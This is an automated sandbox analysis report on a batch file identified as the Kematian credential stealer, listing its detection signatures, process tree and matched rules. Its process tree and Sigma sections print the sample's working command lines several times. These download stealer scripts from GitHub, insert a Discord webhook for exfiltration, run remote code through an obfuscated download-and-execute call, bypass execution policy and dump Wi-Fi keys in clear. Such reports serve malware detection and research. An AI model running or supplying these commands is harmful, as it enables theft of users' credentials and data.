Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
pirates.bat

Overview

General Information

Sample name:pirates.bat
Analysis ID:1467953
MD5:cbcb58dabe241328f335d5710a7d5564
SHA1:ca88012046bb818c24980b8d9c6fef0310dcd662
SHA256:c87215ddba4bbda4ff1c9cf6a8d95012e42d3cecfeb1c22e65f7880e4102388b
Tags:batRUS
Infos:

Detection

Kematian Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Yara detected Kematian Stealer
Yara detected PowerShell ScreenShot
AI detected suspicious sample
Bypasses PowerShell execution policy
Check if machine is in data center or colocation facility
Command shell drops VBS files
Found Tor onion address
Found large BAT file
Found many strings related to Crypto-Wallets (likely being stolen)
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Queries sensitive service information (via WMI, Win32_StartupCommand, often done to detect sandboxes)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Suspicious javascript / visual basic script found (invalid extension)
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Uses netsh to dump wireless credentials
Uses netsh to modify the Windows network and firewall settings
Writes or reads registry keys via WMI
Wscript called in batch mode (surpress errors)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Steals Internet Explorer cookies
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • cmd.exe (PID: 2896 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pirates.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 3272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cscript.exe (PID: 6712 cmdline: cscript //nologo temp.vbs MD5: 24590BF74BBBBFD7D7AC070F4E3C44FD)
      • cmd.exe (PID: 3120 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pirates.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 4348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • findstr.exe (PID: 2840 cmdline: findstr /i "echo" "C:\Users\user\Desktop\pirates.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
        • cmd.exe (PID: 7176 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pirates.bat" " " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • find.exe (PID: 7188 cmdline: find /i "C:\Users\user\Desktop\pirates.bat" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
        • findstr.exe (PID: 7212 cmdline: findstr /i "echo" "C:\Users\user\Desktop\pirates.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
        • findstr.exe (PID: 7232 cmdline: findstr /i "echo" "C:\Users\user\Desktop\pirates.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
        • cmd.exe (PID: 7248 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pirates.bat" " " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • find.exe (PID: 7256 cmdline: find /i "C:\Users\user\Desktop\pirates.bat" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
        • cmd.exe (PID: 7280 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pirates.bat" " " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • find.exe (PID: 7288 cmdline: find /i "C:\Users\user\Desktop\pirates.bat" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
        • findstr.exe (PID: 7324 cmdline: findstr /i "echo" "C:\Users\user\Desktop\pirates.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
        • chcp.com (PID: 7340 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
        • powershell.exe (PID: 7364 cmdline: powershell.exe -nop -c "Write-Host -NoNewLine $null" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • findstr.exe (PID: 7488 cmdline: findstr /i "echo" "C:\Users\user\Desktop\pirates.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
        • net.exe (PID: 7504 cmdline: net session MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
          • net1.exe (PID: 7520 cmdline: C:\Windows\system32\net1 session MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)
        • powershell.exe (PID: 7536 cmdline: powershell -c "$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1241088645289480213/oPJqqAoSqwRaK2J4O5XSC-DuGKqcFDvi3TJVq0bT27LsTvxCelwX2kreM6JwT15zQIyC' | Out-File -FilePath 'kematian.ps1' -Encoding ASCII" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • doskey.exe (PID: 7684 cmdline: doskey CALL=SHIFT MD5: F6D134052BCB12103B729E4D2EA15B91)
        • attrib.exe (PID: 7700 cmdline: attrib +h +s kematian.ps1 MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
        • cmd.exe (PID: 7720 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pirates.bat" " " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • find.exe (PID: 7728 cmdline: find /i "C:\Users\user\Desktop\pirates.bat" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
        • findstr.exe (PID: 7752 cmdline: findstr /i "echo" "C:\Users\user\Desktop\pirates.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
        • findstr.exe (PID: 7776 cmdline: findstr /i "echo" "C:\Users\user\Desktop\pirates.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
        • cmd.exe (PID: 7792 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pirates.bat" " " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • find.exe (PID: 7800 cmdline: find /i "C:\Users\user\Desktop\pirates.bat" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
        • findstr.exe (PID: 7820 cmdline: findstr /i "echo" "C:\Users\user\Desktop\pirates.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
        • powershell.exe (PID: 7840 cmdline: powershell -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "$bytes = [System.IO.File]::ReadAllBytes('C:\Users\user\Desktop\pirates.bat') ; if (($bytes[0] -ne 0xFF) -or ($bytes[1] -ne 0xFE)) { Write-Host 'The first 3 bytes of the file are not FF FE 0A.' ; taskkill /F /IM cmd.exe }" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • findstr.exe (PID: 8068 cmdline: findstr /i "echo" "C:\Users\user\Desktop\pirates.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
        • cmd.exe (PID: 8100 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pirates.bat" " " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • find.exe (PID: 8108 cmdline: find /i "C:\Users\user\Desktop\pirates.bat" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
        • powershell.exe (PID: 8132 cmdline: powershell Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Unrestricted -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
        • wscript.exe (PID: 7248 cmdline: wscript /b MD5: A47CBE969EA935BDD3AB568BB126BC80)
        • powershell.exe (PID: 7296 cmdline: powershell -noprofile -executionpolicy bypass -WindowStyle hidden -file kematian.ps1 MD5: 04029E121A0CFA5991749937DD22A1D9)
          • WmiPrvSE.exe (PID: 7428 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
          • netsh.exe (PID: 7584 cmdline: "C:\Windows\system32\netsh.exe" wlan export profile folder=C:\Users\user\AppData\Local\Temp\wifi key=clear MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
          • powershell.exe (PID: 7624 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I'E'X((New-Object Net.Webclient)."DowNloAdSTRiNg"('https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/webcam.ps1')) MD5: 04029E121A0CFA5991749937DD22A1D9)
            • csc.exe (PID: 7752 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hvw5rqqp\hvw5rqqp.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
              • cvtres.exe (PID: 3052 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4A61.tmp" "c:\Users\user\AppData\Local\Temp\hvw5rqqp\CSC90E3CD70A79D45AA9723BEFA972FDA5B.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
          • powershell.exe (PID: 3852 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I'E'X((New-Object Net.Webclient)."DowNloAdSTRiNg"('https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/kematian_shellcode.ps1')) MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapWindows_Trojan_Donutloader_f40e3759unknownunknown
  • 0x4344a0:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\Desktop\kematian.ps1JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    C:\Users\user\Desktop\kematian.ps1JoeSecurity_PowerShellScreenShotYara detected PowerShell ScreenShotJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000014.00000002.1780292718.000001EC56FAD000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000030.00000002.2641864548.000002A8730B0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
        • 0x3cb95c:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
        0000002C.00000002.2105443989.00000201CC037000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_KematianStealerYara detected Kematian StealerJoe Security
          0000002C.00000002.2105443989.00000201CC032000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_KematianStealerYara detected Kematian StealerJoe Security
            00000030.00000002.2414199980.000002A86A80A000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
            • 0x3cc33c:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
            • 0x887354:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
            Click to see the 12 entries

            Other

            SourceRuleDescriptionAuthorStrings
            amsi64_7296.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
            • 0xdc5:$b2: ::FromBase64String(
            • 0x3cc2:$b2: ::FromBase64String(
            • 0x9fb6:$b2: ::FromBase64String(
            • 0x10b57:$b2: ::FromBase64String(
            • 0x3ca8:$b3: ::UTF8.GetString(
            • 0x9f95:$b3: ::UTF8.GetString(
            • 0x10b3d:$b3: ::UTF8.GetString(
            • 0x2bba:$s1: -join
            • 0xa28f:$s1: -join
            • 0xe523:$s1: -join
            • 0xfdb8:$s1: -join
            • 0x1e635:$s1: -join
            • 0x4fda:$s4: +=
            • 0xa282:$s4: +=
            • 0xaeba:$s4: +=
            • 0xb25a:$s4: +=
            • 0xb28f:$s4: +=
            • 0xb2c1:$s4: +=
            • 0xb2f3:$s4: +=
            • 0xe838:$s4: +=
            • 0x17de1:$s4: +=
            amsi64_7296.amsi.csvMALWARE_Win_PWSH_PoshWiFiStealerDetects PowerShell PoshWiFiStealerditekSHen
            • 0x4d78:$s1: netsh wlan export profile
            • 0x16ca6:$s2: Send-MailMessage

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Invoke-Obfuscation CLIP+ Launcher
            Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: powershell -c "$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1241088645289480213/oPJqqAoSqwRaK2J4O5XSC-DuGKqcFDvi3TJVq0bT27LsTvxCelwX2kreM6JwT15zQIyC' | Out-File -FilePath 'kematian.ps1' -Encoding ASCII" , CommandLine: powershell -c "$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1241088645289480213/oPJqqAoSqwRaK2J4O5XSC-DuGKqcFDvi3TJVq0bT27LsTvxCelwX2kreM6JwT15zQIyC' | Out-File -FilePath 'kematian.ps1' -Encoding ASCII" , CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pirates.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3120, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -c "$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1241088645289480213/oPJqqAoSqwRaK2J4O5XSC-DuGKqcFDvi3TJVq0bT27LsTvxCelwX2kreM6JwT15zQIyC' | Out-File -FilePath 'kematian.ps1' -Encoding ASCII" , ProcessId: 7536, ProcessName: powershell.exe
            Sigma detected: Invoke-Obfuscation VAR+ Launcher
            Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: powershell -c "$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1241088645289480213/oPJqqAoSqwRaK2J4O5XSC-DuGKqcFDvi3TJVq0bT27LsTvxCelwX2kreM6JwT15zQIyC' | Out-File -FilePath 'kematian.ps1' -Encoding ASCII" , CommandLine: powershell -c "$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1241088645289480213/oPJqqAoSqwRaK2J4O5XSC-DuGKqcFDvi3TJVq0bT27LsTvxCelwX2kreM6JwT15zQIyC' | Out-File -FilePath 'kematian.ps1' -Encoding ASCII" , CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pirates.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3120, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -c "$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1241088645289480213/oPJqqAoSqwRaK2J4O5XSC-DuGKqcFDvi3TJVq0bT27LsTvxCelwX2kreM6JwT15zQIyC' | Out-File -FilePath 'kematian.ps1' -Encoding ASCII" , ProcessId: 7536, ProcessName: powershell.exe
            Sigma detected: Change PowerShell Policies to an Insecure Level
            Source: Process startedAuthor: frack113: Data: Command: powershell -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "$bytes = [System.IO.File]::ReadAllBytes('C:\Users\user\Desktop\pirates.bat') ; if (($bytes[0] -ne 0xFF) -or ($bytes[1] -ne 0xFE)) { Write-Host 'The first 3 bytes of the file are not FF FE 0A.' ; taskkill /F /IM cmd.exe }" , CommandLine: powershell -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "$bytes = [System.IO.File]::ReadAllBytes('C:\Users\user\Desktop\pirates.bat') ; if (($bytes[0] -ne 0xFF) -or ($bytes[1] -ne 0xFE)) { Write-Host 'The first 3 bytes of the file are not FF FE 0A.' ; taskkill /F /IM cmd.exe }" , CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pirates.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3120, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "$bytes = [System.IO.File]::ReadAllBytes('C:\Users\user\Desktop\pirates.bat') ; if (($bytes[0] -ne 0xFF) -or ($bytes[1] -ne 0xFE)) { Write-Host 'The first 3 bytes of the file are not FF FE 0A.' ; taskkill /F /IM cmd.exe }" , ProcessId: 7840, ProcessName: powershell.exe
            Sigma detected: Dynamic .NET Compilation Via Csc.EXE
            Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hvw5rqqp\hvw5rqqp.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hvw5rqqp\hvw5rqqp.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I'E'X((New-Object Net.Webclient)."DowNloAdSTRiNg"('https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/webcam.ps1')) , ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7624, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hvw5rqqp\hvw5rqqp.cmdline", ProcessId: 7752, ProcessName: csc.exe
            Sigma detected: PowerShell Web Download
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -c "$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1241088645289480213/oPJqqAoSqwRaK2J4O5XSC-DuGKqcFDvi3TJVq0bT27LsTvxCelwX2kreM6JwT15zQIyC' | Out-File -FilePath 'kematian.ps1' -Encoding ASCII" , CommandLine: powershell -c "$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1241088645289480213/oPJqqAoSqwRaK2J4O5XSC-DuGKqcFDvi3TJVq0bT27LsTvxCelwX2kreM6JwT15zQIyC' | Out-File -FilePath 'kematian.ps1' -Encoding ASCII" , CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pirates.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3120, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -c "$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1241088645289480213/oPJqqAoSqwRaK2J4O5XSC-DuGKqcFDvi3TJVq0bT27LsTvxCelwX2kreM6JwT15zQIyC' | Out-File -FilePath 'kematian.ps1' -Encoding ASCII" , ProcessId: 7536, ProcessName: powershell.exe
            Sigma detected: Usage Of Web Request Commands And Cmdlets
            Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -c "$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1241088645289480213/oPJqqAoSqwRaK2J4O5XSC-DuGKqcFDvi3TJVq0bT27LsTvxCelwX2kreM6JwT15zQIyC' | Out-File -FilePath 'kematian.ps1' -Encoding ASCII" , CommandLine: powershell -c "$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1241088645289480213/oPJqqAoSqwRaK2J4O5XSC-DuGKqcFDvi3TJVq0bT27LsTvxCelwX2kreM6JwT15zQIyC' | Out-File -FilePath 'kematian.ps1' -Encoding ASCII" , CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pirates.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3120, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -c "$t = Iwr -Uri 'https://raw.githubusercontent.com/ChildrenOfYahweh/Kematian-Stealer/main/frontend-src/main.ps1' -UseBasicParsing; $t -replace 'YOUR_WEBHOOK_HERE', 'https://discord.com/api/webhooks/1241088645289480213/oPJqqAoSqwRaK2J4O5XSC-DuGKqcFDvi3TJVq0bT27LsTvxCelwX2kreM6JwT15zQIyC' | Out-File -FilePath 'kematian.ps1' -Encoding ASCII" , ProcessId: 7536, ProcessName: powershell.exe
            Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
            Source: Process startedAuthor: Michael Haag: Data: Command: cscript //nologo temp.vbs, CommandLine: cscript //nologo temp.vbs, CommandLine|base64offset|contains: r+, Image: C:\Windows\System32\cscript.exe, NewProcessName: C:\Windows\System32\cscript.exe, OriginalFileName: C:\Windows\System32\cscript.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pirates.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2896, ParentProcessName: cmd.exe, ProcessCommandLine: cscript //nologo temp.vbs, ProcessId: 6712, ProcessName: cscript.exe
            Sigma detected: Dynamic CSharp Compile Artefact
            Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7624, TargetFilename: C:\Users\user\AppData\Local\Temp\hvw5rqqp\hvw5rqqp.cmdline
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -nop -c "Write-Host -NoNewLine $null" , CommandLine: powershell.exe -nop -c "Write-Host -NoNewLine $null" , CommandLine|base64offset|contains: z), Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\pirates.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3120, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -nop -c "Write-Host -NoNewLine $null" , ProcessId: 7364, ProcessName: powershell.exe
            Sigma detected: PowerShell Script Dropped Via PowerShell.EXE
            Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7536, TargetFilename: C:\Users\user\Desktop\kematian.ps1

            Data Obfuscation

            barindex
            Sigma detected: Dot net compiler compiles file from suspicious location
            Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hvw5rqqp\hvw5rqqp.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hvw5rqqp\hvw5rqqp.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I'E'X((New-Object Net.Webclient)."DowNloAdSTRiNg"('https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/webcam.ps1')) , ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7624, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hvw5rqqp\hvw5rqqp.cmdline", ProcessId: 7752, ProcessName: csc.exe

            Snort Signatures

            No Snort rule has matched

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.4:49730 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.16.123.96:443 -> 192.168.2.4:49737 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:63775 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.4:63776 version: TLS 1.2
